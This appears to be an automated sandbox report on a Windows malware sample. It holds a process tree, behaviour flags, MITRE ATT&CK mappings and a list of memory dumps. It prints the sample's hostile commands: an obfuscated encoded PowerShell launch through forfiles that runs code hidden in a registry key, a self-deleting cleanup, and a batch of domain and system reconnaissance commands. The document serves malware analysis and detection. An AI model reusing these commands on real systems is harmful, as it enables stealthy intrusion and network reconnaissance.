PID 1948 wrote to memory of 1012	1948	cmd.exe	37
PID 1948 wrote to memory of 1012	1948	cmd.exe	37
PID 1012 wrote to memory of 1120	1012	forfiles.exe	39
PID 1012 wrote to memory of 1120	1012	forfiles.exe	39
PID 1012 wrote to memory of 1120	1012	forfiles.exe	39
PID 1120 wrote to memory of 1292	1120	cmd.exe	40
PID 1120 wrote to memory of 1292	1120	cmd.exe	40
PID 1120 wrote to memory of 1292	1120	cmd.exe	40
PID 1292 wrote to memory of 1640	1292	powershell.exe	43
PID 1292 wrote to memory of 1640	1292	powershell.exe	43
PID 1292 wrote to memory of 1640	1292	powershell.exe	43
PID 1292 wrote to memory of 844	1292	powershell.exe	44
PID 1292 wrote to memory of 844	1292	powershell.exe	44
PID 1292 wrote to memory of 844	1292	powershell.exe	44
PID 1292 wrote to memory of 1580	1292	powershell.exe	45
PID 1292 wrote to memory of 1580	1292	powershell.exe	45
PID 1292 wrote to memory of 1580	1292	powershell.exe	45
PID 1580 wrote to memory of 1544	1580	csc.exe	46
PID 1580 wrote to memory of 1544	1580	csc.exe	46
PID 1580 wrote to memory of 1544	1580	csc.exe	46
PID 1292 wrote to memory of 1472	1292	powershell.exe	47
PID 1292 wrote to memory of 1472	1292	powershell.exe	47
PID 1292 wrote to memory of 1472	1292	powershell.exe	47
PID 1472 wrote to memory of 1124	1472	csc.exe	48
PID 1472 wrote to memory of 1124	1472	csc.exe	48
PID 1472 wrote to memory of 1124	1472	csc.exe	48
PID 1292 wrote to memory of 1368	1292	powershell.exe	11
PID 304 wrote to memory of 1368	304	Restr.exe	11
PID 1960 wrote to memory of 1752	1960	cmd.exe	51
PID 1960 wrote to memory of 1752	1960	cmd.exe	51
PID 1960 wrote to memory of 1752	1960	cmd.exe	51
PID 1292 wrote to memory of 760	1292	iexpress.exe	53
PID 1292 wrote to memory of 760	1292	iexpress.exe	53
PID 1292 wrote to memory of 760	1292	iexpress.exe	53
PID 980 wrote to memory of 1012	980	cmd.exe	57
PID 980 wrote to memory of 1012	980	cmd.exe	57
PID 980 wrote to memory of 1012	980	cmd.exe	57
PID 1012 wrote to memory of 1292	1012	net.exe	58
PID 1012 wrote to memory of 1292	1012	net.exe	58
PID 1012 wrote to memory of 1292	1012	net.exe	58
PID 1364 wrote to memory of 1936	1364	cmd.exe	62
PID 1364 wrote to memory of 1936	1364	cmd.exe	62
PID 1364 wrote to memory of 1936	1364	cmd.exe	62
PID 1936 wrote to memory of 1656	1936	net.exe	63
PID 1936 wrote to memory of 1656	1936	net.exe	63
PID 1936 wrote to memory of 1656	1936	net.exe	63
PID 1908 wrote to memory of 1992	1908	cmd.exe	68
PID 1908 wrote to memory of 1992	1908	cmd.exe	68
PID 1908 wrote to memory of 1992	1908	cmd.exe	68
PID 952 wrote to memory of 1784	952	cmd.exe	75
PID 952 wrote to memory of 1784	952	cmd.exe	75
PID 952 wrote to memory of 1784	952	cmd.exe	75
PID 1540 wrote to memory of 1296	1540	cmd.exe	80
PID 1540 wrote to memory of 1296	1540	cmd.exe	80
PID 1540 wrote to memory of 1296	1540	cmd.exe	80

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1368
- C:\Users\Admin\AppData\Local\Temp\Restr.exe
  "C:\Users\Admin\AppData\Local\Temp\Restr.exe"
  2⤵
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\system32\forfiles.exe
    forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1012
  - - C:\Windows\system32\cmd.exe
      /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1120
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1292
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1640
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:844
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1580
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp"
        7⤵
        
        PID:1544
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1472
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC20.tmp"
        7⤵
        
        PID:1124
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\RESTR.EXE"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\system32\timeout.exe
    timeout /t 5
    3⤵
    - Delays execution with timeout.exe
    PID:1752
- C:\Windows\system32\iexpress.exe
  iexpress.exe /n /q /m C:\Users\Admin\AppData\Local\Temp\6D90.bin
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1292
- - C:\Windows\system32\makecab.exe
    C:\Windows\system32\makecab.exe /f "C:\Users\Admin\~Columnsoftware.DDF"
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\A5C0.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:980
- - C:\Windows\system32\net.exe
    net group "domain computers" /domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 group "domain computers" /domain
      4⤵
      PID:1292
- C:\Windows\syswow64\svchost.exe
  C:\Windows\syswow64\svchost.exe
  2⤵
  PID:568
- C:\Windows\system32\cmd.exe
  cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5BA0.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1364
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:1656
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5BA0.bin0 > C:\Users\Admin\AppData\Local\Temp\5BA0.bin & del C:\Users\Admin\AppData\Local\Temp\5BA0.bin0"
  2⤵
  PID:988
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:1992
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:980
- C:\Windows\system32\cmd.exe
  cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:1784
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1836
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:1296
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:576
- C:\Windows\system32\cmd.exe
  cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1020
- - C:\Windows\system32\whoami.exe
    whoami /all
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1200
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1676
- C:\Windows\system32\cmd.exe
  cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1744
- - C:\Windows\system32\net.exe
    net localgroup administrators
    3⤵
    PID:1468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:1656
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1012
- C:\Windows\system32\cmd.exe
  cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1200
- - C:\Windows\system32\net.exe
    net group "domain computers" /domain
    3⤵
    PID:1924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 group "domain computers" /domain
      4⤵
      PID:1352
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1708
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1040
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1688
- C:\Windows\system32\cmd.exe
  cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1744
- - C:\Windows\system32\driverquery.exe
    driverquery.exe
    3⤵
    PID:1200
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1900
- C:\Windows\system32\cmd.exe
  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:576
- - C:\Windows\system32\reg.exe
    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
    3⤵
    PID:1652
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1600
- C:\Windows\system32\cmd.exe
  cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
  2⤵
  PID:1060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get domain
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1380
- - C:\Windows\system32\more.com
    more
    3⤵
    PID:1676
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\7AD4.bin0 > C:\Users\Admin\AppData\Local\Temp\7AD4.bin & del C:\Users\Admin\AppData\Local\Temp\7AD4.bin0"
  2⤵
  PID:1020

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1840
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:734213 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1080

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Privilege Escalation

Defense Evasion

Connection Proxy

T1090

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Connection Proxy

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/304-56-0x0000000000230000-0x000000000023C000-memory.dmp

Filesize
48KB

Download
memory/304-65-0x0000000000270000-0x0000000000272000-memory.dmp

Filesize
8KB

Download
memory/304-59-0x0000000000240000-0x0000000000250000-memory.dmp

Filesize
64KB

Download
memory/304-54-0x000000000052E000-0x0000000000539000-memory.dmp

Filesize
44KB

Download
memory/304-57-0x0000000075C41000-0x0000000075C43000-memory.dmp

Filesize
8KB

Download
memory/304-58-0x0000000001000000-0x000000000106F000-memory.dmp

Filesize
444KB

Download
memory/304-55-0x000000000052E000-0x0000000000539000-memory.dmp

Filesize
44KB

Download
memory/304-111-0x00000000002D0000-0x0000000000311000-memory.dmp

Filesize
260KB

Download
memory/844-95-0x0000000002692000-0x0000000002694000-memory.dmp

Filesize
8KB

Download
memory/844-93-0x0000000002690000-0x0000000002692000-memory.dmp

Filesize
8KB

Download
memory/844-92-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

Filesize
9.6MB

Download
memory/844-91-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

Filesize
11.4MB

Download
memory/844-94-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

Filesize
9.6MB

Download
memory/844-96-0x0000000002694000-0x0000000002697000-memory.dmp

Filesize
12KB

Download
memory/844-97-0x000000000269B000-0x00000000026BA000-memory.dmp

Filesize
124KB

Download
memory/1292-75-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

Filesize
9.6MB

Download
memory/1292-72-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

Filesize
11.4MB

Download
memory/1292-110-0x000000001B660000-0x000000001B673000-memory.dmp

Filesize
76KB

Download
memory/1292-81-0x00000000025BB000-0x00000000025DA000-memory.dmp

Filesize
124KB

Download
memory/1292-77-0x00000000025B4000-0x00000000025B7000-memory.dmp

Filesize
12KB

Download
memory/1292-76-0x00000000025B2000-0x00000000025B4000-memory.dmp

Filesize
8KB

Download
memory/1292-71-0x000007FEFC1E1000-0x000007FEFC1E3000-memory.dmp

Filesize
8KB

Download
memory/1292-74-0x00000000025B0000-0x00000000025B2000-memory.dmp

Filesize
8KB

Download
memory/1292-73-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

Filesize
9.6MB

Download
memory/1368-112-0x00000000029B0000-0x00000000029C5000-memory.dmp

Filesize
84KB

Download
memory/1368-718-0x0000000002990000-0x00000000029A5000-memory.dmp

Filesize
84KB

Download
memory/1640-80-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

Filesize
11.4MB

Download
memory/1640-86-0x0000000002342000-0x0000000002344000-memory.dmp

Filesize
8KB

Download
memory/1640-87-0x0000000002344000-0x0000000002347000-memory.dmp

Filesize
12KB

Download
memory/1640-82-0x000000001B830000-0x000000001BB2F000-memory.dmp

Filesize
3.0MB

Download
memory/1640-88-0x000000000234B000-0x000000000236A000-memory.dmp

Filesize
124KB

Download
memory/1640-85-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

Filesize
9.6MB

Download
memory/1640-83-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

Filesize
9.6MB

Download
memory/1640-84-0x0000000002340000-0x0000000002342000-memory.dmp

Filesize
8KB

Download